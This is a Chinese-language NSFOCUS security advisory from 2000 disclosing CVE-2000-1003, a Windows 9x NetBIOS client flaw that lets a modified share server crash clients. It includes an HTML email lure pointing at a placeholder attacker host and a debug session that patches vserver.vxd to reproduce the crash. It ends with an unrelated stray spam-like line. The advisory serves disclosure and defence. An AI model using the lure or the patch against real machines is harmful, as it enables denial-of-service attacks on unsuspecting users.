首頁 -> 安全研究

安全研究

安全公告
綠盟科技安全公告(SA2000-04)

NSFOCUS安全小組([email protected])
http://www.nsfocus.com

Microsoft Windows 9x共享訪問客戶端類型檢測漏洞

發布日期:2000-10-11

CVE ID:CVE-2000-1003

受影響的軟件及系統:
====================
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98 Second Edition

綜述:
======
NSFOCUS 安全小組發現了微軟Windows 9x NETBIOS 客戶端存在一個安全漏洞。這個漏洞允許惡意攻擊者提供一個修改過的文件共享服務器,當誘使Windows 9x客戶訪問它的共享資源時,會導致對客戶的拒絕服務攻擊。

分析:
======
當Windows 9x客戶訪問文件共享服務時,會比較服務端傳來的驅動類型,,如果服務器返回服務類型不是" ?????"、" A:"、" LPT1:"、" COMM"、"IPC"中的一種,客戶端就會錯誤得得到第6種類型,而實際上只有5種,所以進行轉換時會得到錯誤的驅動頭指針,從而調用錯誤的驅動函數地址,造成客戶端不穩定甚至崩潰。

惡意用戶可以通過構造一封HTML格式的郵件發送給目標用戶,例如:

<html>
<body>
hello
<img src="file:\\attacker.host\pub\a.gif">
<body>
</html>

當Windows 9x客戶使用outlook express或者其他支持HTML郵件的郵件程序打開這封郵件時,將使客戶主動連結惡意用戶控制的主機,如果這臺主機的共享服務程序已經被攻擊者修改過,就可能造成windows 9x客戶遭受拒絕服務攻擊。

測試方法:
==========
下面提供一個測試方法,操作系統是windows 98 Secondary Edition(英文版):


1. D:\WIN98\SYSTEM>debug vserver.vxd
-d 2b60
1266:2B60  3C 01 75 24 8B C8 C1 E9-10 83 F9 6A 73 05 83 F9   <.u$.......js...
1266:2B70  64 73 1B 83 F9 13 72 10-83 F9 1F 76 0C 80 7F 3E   ds....r....v...>
1266:2B80  05 73 05 83 F9 58 77 21-C3 66 B8 03 38 C3 83 F9   .s...Xw!.f..8...
1266:2B90  65 74 10 83 F9 68 74 32-83 F9 67 75 1B B8 03 38   et...ht2..gu...8
1266:2BA0  1A 00 C3 B8 03 38 1E 00-C3 83 F9 6E 74 10 83 F9   .....8.....nt...
1266:2BB0  70 74 11 83 F9 6C 74 12-B8 03 38 1F 00 C3 B8 01   pt...lt...8.....
1266:2BC0  00 02 00 C3 B8 03 38 27-00 C3 B8 03 38 15 00 C3   ......8'....8...
1266:2BD0  91 FE 48 32 75 0E 83 78-2A 00 74 08 8D 40 2A E8   ..H2u..x*[email protected]*.
-n vserver.bak    (備份)
-w
Writing 1B8F8 bytes
-n vserver.vxd
-e 2b60 33 c0 c3
-w
Writing 1B8F8 bytes
-q

2. 重啟機器.

3. 為一個共享目錄設置一個口令

4. 從其他的Windows 9x機器訪問這臺主機的那個共享目錄,將導致win9x客戶機發生藍屏。系統開始變得不穩定,并可能崩潰。

解決方法:
==========
NSFOCUS建議您不要隨意訪問不可信主機的共享服務。并禁止通過TCP/IP協議使用NETBIOS程序。

廠商狀態:
==========
我們已經將這個問題通報給了微軟公司。

聲 明
==========

本安全公告僅用來描述可能存在的安全問題,綠盟科技不為此安全公告提供任何保證或承諾。由于傳播、利用此安全公告所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,綠盟科技以及安全公告作者不為此承擔任何責任。綠盟科技擁有對此安全公告的修改和解釋權。如欲轉載或傳播此安全公告,必須保證此安全公告的完整性,包括版權聲明等全部內容。未經綠盟科技允許,不得任意修改或者增減此安全公告內容,不得以任何方式將其用于商業目的。

關于綠盟科技
============

綠盟科技(NSFOCUS Co., Ltd.)是中國網絡安全領域的領導企業,致力于網絡和系統安全問題的研究、高端網絡安全產品的研發、銷售與網絡安全服務,在入侵檢測/保護、遠程評估、 DDoS攻擊防護等方面提供具有國際競爭能力的先進產品,是國內最具安全服務經驗的專業公司。有關綠盟科技的詳情請參見: http://www.nsfocus.com

© 2020 綠盟科技
浙江快乐彩网上投注